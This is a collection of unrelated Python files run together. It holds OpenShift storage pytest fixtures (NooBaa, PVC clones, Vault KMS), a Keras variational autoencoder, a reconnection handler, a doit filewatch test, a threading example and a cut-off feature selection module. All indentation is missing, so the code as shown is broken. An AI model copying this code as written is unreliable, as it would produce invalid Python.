min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# prior to 4.6 we configured the ep count directly on the noobaa cr.
if float(config.ENV_DATA["ocs_version"]) < 4.6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
namespace=pvc_obj.namespace,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if config.REPORTING.get("rp_launch_url"):
request.config._metadata["RP Launch URL:"] = config.REPORTING["rp_launch_url"]
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List PVC instance
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
# Attach a new pgsql pod restored pvcs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
Create In-cluster elastic-search deployment for benchmark-operator tests.
using the name es - as shortcut for elastic-search for simplicity
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="session")
def setup_ui_session(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="class")
def setup_ui_class(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="function")
def setup_ui(request):
return setup_ui_fixture(request)
def setup_ui_fixture(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load cluster_info.json file if exists (on cluster
installed via Flexy) and apply the information to the config object (for
example related to disconnected cluster)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def ripsaw(request):
# Create benchmark Operator (formerly ripsaw)
ripsaw = RipSaw()
def teardown():
ripsaw.cleanup()
time.sleep(10)
request.addfinalizer(teardown)
return ripsaw
@pytest.fixture(scope="function")
def pv_encryption_kms_setup_factory(request):
"""
Create vault resources and setup csi-kms-connection-details configMap
"""
vault = KMS.Vault()
def factory(kv_version):
"""
Args:
kv_version(str): KV version to be used, either v1 or v2
Returns:
object: Vault(KMS) object
"""
vault.gather_init_vault_conf()
vault.update_vault_env_vars()
# Check if cert secrets already exist, if not create cert resources
ocp_obj = OCP(kind="secret", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(resource_name="ocs-kms-ca-secret", column="NAME")
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.create_ocs_vault_cert_resources()
# Create vault namespace, backend path and policy in vault
vault_resource_name = create_unique_resource_name("test", "vault")
vault.vault_create_namespace(namespace=vault_resource_name)
vault.vault_create_backend_path(
backend_path=vault_resource_name, kv_version=kv_version
)
vault.vault_create_policy(policy_name=vault_resource_name)
# If csi-kms-connection-details exists, edit the configmap to add new vault config
ocp_obj = OCP(kind="configmap", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(
resource_name="csi-kms-connection-details", column="NAME"
)
new_kmsid = vault_resource_name
vdict = defaults.VAULT_CSI_CONNECTION_CONF
for key in vdict.keys():
old_key = key
vdict[new_kmsid] = vdict.pop(old_key)
vdict[new_kmsid]["VAULT_BACKEND_PATH"] = vault_resource_name
vdict[new_kmsid]["VAULT_NAMESPACE"] = vault_resource_name
vault.kmsid = vault_resource_name
if kv_version == "v1":
vdict[new_kmsid]["VAULT_BACKEND"] = "kv"
else:
vdict[new_kmsid]["VAULT_BACKEND"] = "kv-v2"
KMS.update_csi_kms_vault_connection_details(vdict)
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.kmsid = "1-vault"
vault.create_vault_csi_kms_connection_details(kv_version=kv_version)
return vault
def finalizer():
"""
Remove the vault config from csi-kms-connection-details configMap
"""
if len(KMS.get_encryption_kmsid()) > 1:
KMS.remove_kmsid(vault.kmsid)
# Delete the resources in vault
vault.remove_vault_backend_path()
vault.remove_vault_policy()
vault.remove_vault_namespace()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def cephblockpool_factory_ui_class(request, setup_ui_class):
return cephblockpool_factory_ui_fixture(request, setup_ui_class)
@pytest.fixture(scope="session")
def cephblockpool_factory_ui_session(request, setup_ui_session):
return cephblockpool_factory_ui_fixture(request, setup_ui_session)
@pytest.fixture(scope="function")
def cephblockpool_factory_ui(request, setup_ui):
return cephblockpool_factory_ui_fixture(request, setup_ui)
def cephblockpool_factory_ui_fixture(request, setup_ui):
"""
This funcion create new cephblockpool
"""
instances = []
def factory(
replica=3,
compression=False,
):
"""
Args:
replica (int): size of pool 2,3 supported for now
compression (bool): True to enable compression otherwise False
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the CephBlockPool.
"""
blockpool_ui_object = BlockPoolUI(setup_ui)
pool_name, pool_status = blockpool_ui_object.create_pool(
replica=replica, compression=compression
)
if pool_status:
log.info(
f"Pool {pool_name} with replica {replica} and compression {compression} was created and "
f"is in ready state"
)
ocs_blockpool_obj = create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL,
resource_name=pool_name,
)
instances.append(ocs_blockpool_obj)
return ocs_blockpool_obj
else:
blockpool_ui_object.take_screenshot()
if pool_name:
instances.append(
create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL, resource_name=pool_name
)
)
raise PoolDidNotReachReadyState(
f"Pool {pool_name} with replica {replica} and compression {compression}"
f" did not reach ready state"
)
def finalizer():
"""
Delete the cephblockpool from ui and if fails from cli
"""
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Pool is already deleted")
continue
blockpool_ui_obj = BlockPoolUI(setup_ui)
if not blockpool_ui_obj.delete_pool(instance.name):
instance.delete()
raise PoolNotDeletedFromUI(
f"Could not delete block pool {instances.name} from UI."
f" Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_ui_class(
request, cephblockpool_factory_ui_class, setup_ui_class
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_class, setup_ui_class
)
@pytest.fixture(scope="session")
def storageclass_factory_ui_session(
request, cephblockpool_factory_ui_session, setup_ui_session
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_session, setup_ui_session
)
@pytest.fixture(scope="function")
def storageclass_factory_ui(request, cephblockpool_factory_ui, setup_ui):
return storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui)
def storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui):
"""
The function create new storageclass
"""
instances = []
def factory(
provisioner=constants.OCS_PROVISIONERS[0],
compression=False,
replica=3,
create_new_pool=False,
encryption=False, # not implemented yet
reclaim_policy=constants.RECLAIM_POLICY_DELETE, # not implemented yet
default_pool=constants.DEFAULT_BLOCKPOOL,
existing_pool=None,
):
"""
Args:
provisioner (str): The name of the provisioner. Default is openshift-storage.rbd.csi.ceph.com
compression (bool): if create_new_pool is True, compression will be set if True.
replica (int): if create_new_pool is True, replica will be set.
create_new_pool (bool): True to create new pool with factory.
encryption (bool): enable PV encryption if True.
reclaim_policy (str): Reclaim policy for the storageclass.
existing_pool(str): Use pool name for storageclass.
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the storageclass.
"""
storageclass_ui_object = StorageClassUI(setup_ui)
if existing_pool is None and create_new_pool is False:
pool_name = default_pool
if create_new_pool is True:
pool_ocs_obj = cephblockpool_factory_ui(
replica=replica, compression=compression
)
pool_name = pool_ocs_obj.name
if existing_pool is not None:
pool_name = existing_pool
sc_name = storageclass_ui_object.create_storageclass(pool_name)
if sc_name is None:
log.error("Storageclass was not created")
raise StorageclassNotCreated(
"Storageclass is not found in storageclass list page"
)
else:
log.info(f"Storageclass created with name {sc_name}")
sc_obj = create_ocs_object_from_kind_and_name(
resource_name=sc_name, kind=constants.STORAGECLASS
)
instances.append(sc_obj)
log.info(f"{sc_obj.get()}")
return sc_obj
def finalizer():
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Storageclass is already deleted")
continue
storageclass_ui_obj = StorageClassUI(setup_ui)
if not storageclass_ui_obj.delete_rbd_storage_class(instance.name):
instance.delete()
raise StorageClassNotDeletedFromUI(
f"Could not delete storageclass {instances.name} from UI."
f"Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
|
vae.py
|
import datetime
from threading import Thread, Lock
from keras import backend as K
from keras.models import clone_model, Model
from keras.layers import Input, Dense, Lambda
from keras.callbacks import TensorBoard
import tensorflow as tf
from config.model import TENSORBOARD_LOG_DIR
from config.model import VAE_MODEL
LOCK = Lock()
latent_dim = 3
epochs = 1
class VAE:
def __init__(self, x_shape, save_interval=100):
"""
Initialize VAE setting
:param x_shape: X shape(not x(i) shape)
"""
m, n = x_shape
hidden_unit_size = n >> 2
self.graph = tf.Graph()
with self.graph.as_default():
self.example = tf.placeholder(shape=(None, n), dtype=tf.float32)
self.queue = tf.FIFOQueue(capacity=20, dtypes=[tf.float32])
self.enqueue = self.queue.enqueue((self.example, ))
self.qr = tf.train.QueueRunner(self.queue, [self.enqueue] * 4)
self.coord = tf.train.Coordinator()
# x = Input(shape=(n, ), name='x')
x = Input(shape=(n, ), dtype=tf.float32, tensor=self.queue.dequeue(), name='x')
h1 = Dense(hidden_unit_size, activation='relu', dtype=tf.float32, name='h1')(x)
mean = Dense(latent_dim, name='mean')(h1)
var = Dense(latent_dim, name='var')(h1)
def sampling(args):
z_mean, z_var = args
epsilon = K.random_normal(shape=K.shape(z_var))
return z_mean + z_var * epsilon
# return z_mean + K.exp(z_var / 2) * epsilon
z = Lambda(sampling, name='z')([mean, var])
decoder_h1 = Dense(hidden_unit_size, activation='relu', name='decoder_h1')(z)
y = Dense(n, activation='sigmoid', name='y')(decoder_h1)
def loss(y_true, y_pred):
kld = (-1 / 2) * (K.sum(1 + K.log(K.square(var)) - K.square(mean) - K.square(var), axis=1))
# kld = (-1 / 2) * K.sum(1 + var - K.square(mean) - K.exp(var))
re = K.mean(K.sum(K.binary_crossentropy(y_true, y_pred), axis=1))
return K.mean(kld + re)
model = Model(inputs=x, outputs=y)
model.compile(optimizer='adam', loss=loss)
# using learn
self._model = model
# using predict without being affected by learning
self.model = clone_model(self._model)
self.y = y
e_x = Input(shape=(n, ), name='e_x')
e_h1 = Dense(hidden_unit_size, activation='relu', name='e_h1')(e_x)
e_mean = Dense(latent_dim, name='e_mean')(e_h1)
e_var = Dense(latent_dim, name='e_var')(e_h1)
e_z = Lambda(sampling, name='e_z')([e_mean, e_var])
self.encoder = Model(inputs=e_x, outputs=e_z)
z_input = Input(shape=(latent_dim,))
d_h1 = Dense(hidden_unit_size, activation='relu', name='d_h1')(z_input)
d_y = Dense(n, activation='sigmoid', name='d_y')(d_h1)
self.decoder = Model(inputs=z_input, outputs=d_y)
# self.a = tf.placeholder(dtype=tf.float32, shape=(None, 2))
# self.b = tf.placeholder(dtype=tf.float32, shape=(None, 2))
# self.ab = self.a + self.b
self.session = tf.Session(graph=self.graph)
K.set_session(self.session)
def learn(self, x_train, x_test=None):
if x_test is not None:
validation_data = (x_test, x_test)
else:
validation_data = None
enqueue_threads = self.qr.create_threads(self.session, coord=self.coord, start=True)
with LOCK:
for i in range(1):
self.session.run(self.enqueue, feed_dict={self.example: x_train})
self.coord.join(enqueue_threads)
# with tf.Session(graph=K.get_session().graph):
# self._model.fit(x=x_train, y=x_train, epochs=epochs, validation_data=validation_data,
# callbacks=[TensorBoard(log_dir=TENSORBOARD_LOG_DIR, histogram_freq=1)])
with LOCK:
w = self._model.get_weights()
self.model.set_weights(w)
self.encoder.set_weights(w[0:len(w) - 4])
self.decoder.set_weights(w[-4:])
self.model.save(VAE_MODEL + datetime.datetime.now().strftime("%Y%m%d%H%M%S") + '.h5')
def predict(self, x):
return self.decoder.predict(self.encoder.predict(x))
def encode(self, x):
# with K.get_session() as sess:
return self.encoder.predict(x)
def decode(self, z):
# with K.get_session() as sess:
return self.decoder.predict(z)
def _show_predict_image(self, x):
import matplotlib.pyplot as plt
import numpy as np
pred = self.predict(x)
plt.imshow(np.reshape(x[0], (28, 28)), cmap='Greys_r')
plt.show()
plt.imshow(np.reshape(pred[0], (28, 28)), cmap='Greys_r')
plt.show()
plt.imshow(np.reshape(x[5000], (28, 28)), cmap='Greys_r')
plt.show()
plt.imshow(np.reshape(pred[5000], (28, 28)), cmap='Greys_r')
plt.show()
def _main(args):
x_train, x_test = args
vae = VAE(x_shape=x_train.shape)
for _ in range(2):
thread = Thread(target=vae.learn, kwargs={'x_train': x_train, 'x_test': x_test})
thread.start()
# vae.learn(x_train, x_test)
# vae.learn(x_train, x_test)
# print(thread.is_alive())
# thread.join()
# print(thread.is_alive())
# vae._show_predict_image(x_test)
if __name__ == '__main__':
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 784)
x_test = x_test.reshape(10000, 784)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
_main((x_train, x_test))
|
reconnection.py
|
import sys
if sys.version_info.major is 2:
from aenum import Enum
else:
from enum import Enum
import threading
import time
class ConnectionStateChecker(object):
def __init__(
self,
ping_function,
keep_alive_interval,
sleep=1):
self.sleep = sleep
self.keep_alive_interval = keep_alive_interval
self.last_message = time.time()
self.ping_function = ping_function
self.running = False
self._thread = None
def start(self):
self.running = True
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def run(self):
while self.running:
time.sleep(self.sleep)
time_without_messages = time.time() - self.last_message
if self.keep_alive_interval < time_without_messages:
self.ping_function()
def stop(self):
self.running = False
class ReconnectionType(Enum):
raw = 0 # Reconnection with max reconnections and constant sleep time
interval = 1 # variable sleep time
class ReconnectionHandler(object):
def __init__(self):
self.reconnecting = False
self.attempt_number = 0
self.last_attempt = time.time()
def next(self):
raise NotImplementedError()
def reset(self):
self.attempt_number = 0
self.reconnecting = False
class RawReconnectionHandler(ReconnectionHandler):
def __init__(self, sleep_time, max_attempts):
super(RawReconnectionHandler, self).__init__()
self.sleep_time = sleep_time
self.max_reconnection_attempts = max_attempts
def next(self):
self.reconnecting = True
if self.max_reconnection_attempts is not None:
if self.attempt_number <= self.max_reconnection_attempts:
self.attempt_number += 1
return self.sleep_time
else:
raise ValueError("Max attemps reached {0}".format(self.max_reconnection_attempts))
else: # Infinite reconnect
return self.sleep_time
class IntervalReconnectionHandler(ReconnectionHandler):
def __init__(self, intervals):
self._intervals = intervals
def next(self):
self.reconnecting = True
index = self.attempt_number
self.attempt_number += 1
return self._intervals[index]
|
test_filewatch.py
|
import os
import time
import threading
import pytest
from doit.filewatch import FileModifyWatcher, get_platform_system
def testUnsuportedPlatform(monkeypatch):
monkeypatch.setattr(FileModifyWatcher, 'supported_platforms', ())
pytest.raises(Exception, FileModifyWatcher, [])
platform = get_platform_system()
@pytest.mark.skipif('platform not in FileModifyWatcher.supported_platforms')
class TestFileWatcher(object):
def testInit(self, restore_cwd, tmpdir):
dir1 = 'data3'
files = ('data/w1.txt', 'data/w2.txt')
tmpdir.mkdir('data')
for fname in files:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], dir1))
# file_list contains absolute paths
assert 2 == len(fw.file_list)
assert os.path.abspath(files[0]) in fw.file_list
assert os.path.abspath(files[1]) in fw.file_list
# watch_dirs
assert 2 == len(fw.watch_dirs)
assert tmpdir.join('data') in fw.watch_dirs
assert tmpdir.join('data3') in fw.watch_dirs
# notify_dirs
assert 1 == len(fw.notify_dirs)
assert tmpdir.join('data3') in fw.notify_dirs
def testHandleEventNotSubclassed(self):
fw = FileModifyWatcher([])
pytest.raises(NotImplementedError, fw.handle_event, None)
def testLoop(self, restore_cwd, tmpdir):
files = ['data/w1.txt', 'data/w2.txt', 'data/w3.txt']
stop_file = 'data/stop'
tmpdir.mkdir('data')
for fname in files + [stop_file]:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], stop_file))
events = []
should_stop = []
started = []
def handle_event(event):
events.append(event.pathname)
if event.pathname.endswith("stop"):
should_stop.append(True)
fw.handle_event = handle_event
def loop_callback(notifier):
started.append(True)
# force loop to stop
if should_stop:
raise KeyboardInterrupt
loop_thread = threading.Thread(target=fw.loop, args=(loop_callback,))
loop_thread.daemon = True
loop_thread.start()
# wait watcher to be ready
while not started: # pragma: no cover
time.sleep(0.01)
assert loop_thread.is_alive()
# write in watched file
fd = open(files[0], 'w')
fd.write("hi")
fd.close()
# write in non-watched file
fd = open(files[2], 'w')
fd.write("hi")
fd.close()
# write in another watched file
fd = open(files[1], 'w')
fd.write("hi")
fd.close()
# tricky to stop watching
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
time.sleep(0.1)
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
# this test is very flaky so we give it one more chance...
# write on file to terminate thread
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
raise Exception("thread not terminated")
assert os.path.abspath(files[0]) == events[0]
assert os.path.abspath(files[1]) == events[1]
|
9.enumerate_all_threads.py
|
# It is not necessary to retain an explicit handle to all of the daemon threads in order to ensure they have completed before exiting the main process. enumerate() returns a list of active Thread instances. The list includes the current thread, and since joining the current thread is not allowed (it introduces a deadlock situation), it must be skipped.
import random
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def worker():
"""thread worker function"""
t = threading.currentThread()
pause = random.randint(1, 50)
logging.debug('sleeping %s', pause)
time.sleep(pause)
logging.debug('ending')
return
for i in range(3):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is main_thread:
continue
logging.debug('joining %s', t.getName())
t.join()
|
spectral_methods.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Spectral feature selection methods that include Laplacian score, MCFS and SPEC
--------------------------------------------------------------------------------------------------------------------
References:
- He, X., Cai, D., & Niyogi, P. (2006). Laplacian score for feature selection. In NIPS. MIT Press.
- Deng Cai, Chiyuan Zhang, and Xiaofei He. Unsupervised feature selection for multi-cluster data.KDD, 2010
- Zheng Zhao and Huan Liu. Spectral feature selection for supervised and unsupervised learning. In ICML, 2007
--------------------------------------------------------------------------------------------------------------------
"""
# Author: Kaveh Mahdavi <kavehmahdavi74@gmail.com>
# License: BSD 3 clause
# TODO: the output of teh eigen is needed to check. the columns of the output are the eigen vectors.
# Fixme: remove the index from teh feature list
import argparse
import heapq
import json
import math
import operator
import sys
import time
import warnings
import numpy as np
import pandas as pd
from sklearn import linear_model
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.preprocessing import scale
from terminaltables import DoubleTable
from kavica.Mutual_knn import KNN
from kavica.distance_measure import rbf_kernel
from kavica.imputation.base import data_structure_Compatibilization
from kavica.resampling import WightedBootstrapping
from multiprocessing import Process
from multiprocessing.managers import BaseManager
# TODO: it has to be moved to the utility module
def list_splitter(alist, chunks=2):
length = len(alist)
if length < chunks:
raise ValueError("The list can not be splitter into {} chunks that is bigger than list size {}.".format(chunks,
length))
return [alist[i * length // chunks: (i + 1) * length // chunks]
for i in range(chunks)]
def gamma(X):
# default is 1.0/2std
return 1 / (2 * X.std(axis=0).mean())
# TODO: it needed to write to eliminate the redundancy
def has_fitted(estimator, attributes, msg=None, all_or_any=any):
pass
def sort_parja(x, y, order=-1):
# TODO: parameter check (numpy array)
index = np.array(x).argsort(kind='quicksort')
return (np.array(x)[index][::order], np.array(y)[index][::order])
# read the configuration file for preparing the features
def __configoration(config, data):
# read the configuration file
with open(config, 'r') as config:
config_dict = json.load(config)
# Read the data file
df = pd.read_csv(data)
# config the data set based on configuration information
df = df[list(config_dict['hardware_counters'].values())] # sub set of features
df = df.replace([np.inf, -np.inf], np.nan)
lastShape = df.shape
# Remove the all zero rows
df = df[(df.T != 0).any()]
print("The {} row are full null that are eliminated.".format(lastShape[0] - df.shape[0]))
lastShape = df.shape
# Remove all NaN columns.
df = df.ix[:, (pd.notnull(df)).any()]
print("The {} columns are full null that are eliminated.".format(lastShape[1] - df.shape[1]))
if config_dict['missing_values'] == 'mean':
df.fillna(df.mean(), inplace=True)
if config_dict['scale']:
df = pd.DataFrame(scale(df), index=df.index, columns=df.columns)
print(df.mean(axis=0), df.std(axis=0))
# fixme: it is just reset the indexing for test
df = df.reset_index()
return df
def progress(count, total, status=''):
bar_len = 100
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('\r\033[1;36;m[%s] %s%s ...%s' % (bar, percents, '%', status))
sys.stdout.flush()
def arguments_parser():
# set/receive the arguments
if len(sys.argv) == 1:
# It is used for testing and developing time.
arguments = ['config/config_FS_gromacs_64p_INS_CYC.json',
'../parser/source.csv',
'-k',
'2',
'-m',
'LS',
'-bsize',
'2500'
]
sys.argv.extend(arguments)
else:
pass
# parse the arguments
parser = argparse.ArgumentParser(description='The files that are needed for selecting features most important.')
parser.add_argument('config', help='A .json configuration file that included the'
'thread numbers,hardware counters and etc.')
parser.add_argument('csvfile', help='A .csv dataset file')
parser.add_argument('-k',
dest='k',
default=2,
action='store',
type=int,
help="It significances the number of the most important features.")
parser.add_argument('-m',
dest='m',
default='LS',
choices=['LS', 'MCFS', 'SPEC'],
action='store',
type=str.upper,
help="The feature selection method that is either LS, MCFS or SPEC.")
parser.add_argument('-bsize',
dest='bsize',
default=2500,
action='store',
type=int,
help="It significances the 'Bag size' or 'ensemble size'.")
args = parser.parse_args()
if args.k < 2:
raise ValueError("Selected features have to be (=> 2). It is set {}".format(args.k))
return ({"configPath": args.config,
"csvPath": args.csvfile,
"k_features": args.k,
"featureSelectionMethod": args.m,
"bag_size": args.bsize})
######################################################################
# Graph weighting functions
######################################################################
def _identity():
return 1
def dot_product(X, Y):
return np.dot(X, Y)
######################################################################
# Accelerator
######################################################################
class GraphUpdateAccelerator(object):
"""
